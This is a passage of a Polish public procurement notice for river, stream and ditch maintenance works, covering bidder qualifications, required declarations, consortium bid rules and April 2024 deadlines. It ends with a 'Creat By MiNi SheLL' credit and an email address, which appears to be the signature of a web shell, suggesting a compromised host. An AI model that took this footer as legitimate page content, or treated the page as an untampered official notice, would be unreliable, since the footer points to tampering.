utrzymaniowych rzeki, cieku, rowu lub kanału o wartości nie mniejszej niż 50 000,00 zł.<br/><br/>Dla części nr 6:<br/>Zamawiający wymaga, aby Wykonawca wykazał co najmniej jedną pracę polegającą na wykonaniu konserwacji, prac albo robót utrzymaniowych rzeki, cieku, rowu lub kanału o wartości nie mniejszej niż 100 000,00 zł.<br/><br/>Dopuszcza się przedstawienie tej samej pracy na spełnienie warunku zdolności technicznej lub zawodowej przy realizacji wszystkich części zamówienia.<br/><br/>Uwaga: W przypadku podania wartości robót budowlanych w walutach innych niż wskazane przez Zamawiającego, to dla potwierdzenia spełniania warunku Zamawiający dokona przeliczenia tej waluty na PLN według średniego kursu ogłoszonego przez NBP z dnia opublikowania ogłoszenia o zamówieniu w BZP.<br/><br/>Uwaga: W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, spełnienie warunków dotyczących zdolności technicznej <br/>i zawodowej, wykonawcy wykazują łącznie razem lub co najmniej jeden <br/>z nich. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału<br/>w postępowaniu, zgodny w treści z Załącznikiem nr 9 do SWZ, aktualne na dzień składania ofert, celem potwierdzenia, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1<br/>2. oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu o którym mowa w art. 125 ust. 1 ustawy z dnia 11<br/>września 2019 r. - Prawo zamówień publicznych, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, zgodnego ze wzorem stanowiącym Załącznik nr 3 do SWZ.<br/>3. odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej,<br/>sporządzone nie wcześniej niż 3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp.<br/>4. oświadczenie wykonawcy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o<br/>ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej<br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego<br/>wykonawcy należącego do tej samej grupy kapitałowej, zgodne ze wzorem stanowiącym Załącznik nr 4 do SWZ, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 108 ust. 1 pkt 5 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz robót (zgodny w treści z Załącznikiem Nr 5 do SWZ) wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Kosztorys ofertowy (dla każdej części oddzielnie) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający, dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 58 ustawy Pzp) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:<br/>1.	Wykonawcy występując wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>2.	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem, którego adres należy wpisać w Formularzu oferty.<br/>3.	Pełnomocnictwo lub inny dokument (np. umowa konsorcjum, spółki cywilnej) z którego wynika takie pełnomocnictwo należy złożyć razem z ofertą.<br/>4.	W odniesieniu do warunków określonych w pkt 7.2 SWZ, wymagania te muszą być spełnione wspólnie przez Wykonawców składających ofertę wspólną (nie musi ich spełniać osobno każdy z Wykonawców składających ofertę wspólną). Na ich potwierdzenie należy złożyć dokumenty określone w pkt 9.4 SWZ.<br/>5.	Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie zgodne z treścią Załącznika Nr 9 do SWZ, aktualne na dzień składania ofert, celem potwierdzenia, że każdy z Wykonawców ubiegających się wspólnie o zamówienie nie podlega wykluczeniu z postępowania na podstawie art. 108 ust. 1oraz art. 109 ust. 1 pkt 4), 5) oraz 7)-10) i art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 15 kwietnia 2022 roku poz. 835) ustawy Pzp oraz spełnia warunki udziału w postępowaniu określone w SWZ zakresie, w którym każdy z nich wykazuje brak podstaw wykluczenia z postępowania oraz spełnia warunki udziału w postępowaniu.<br/>6.	Każdy z Wykonawców występujących wspólnie obowiązany jest do wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego. W takim przypadku oświadczenia lub dokumenty wymienione w pkt 9.3.1-9.3.3 SWZ składa każdy z Wykonawców występujących wspólnie.<br/>7.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek dotyczący posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>8.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Określone w paragrafie 13 wzoru umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę oraz dokumenty lub oświadczenia składane razem z ofertą należy złożyć za pośrednictwem Platformy Zakupowej – zwanej dalej „Platformą” – pod adresem: http://www.przetargi.wody.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-05 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com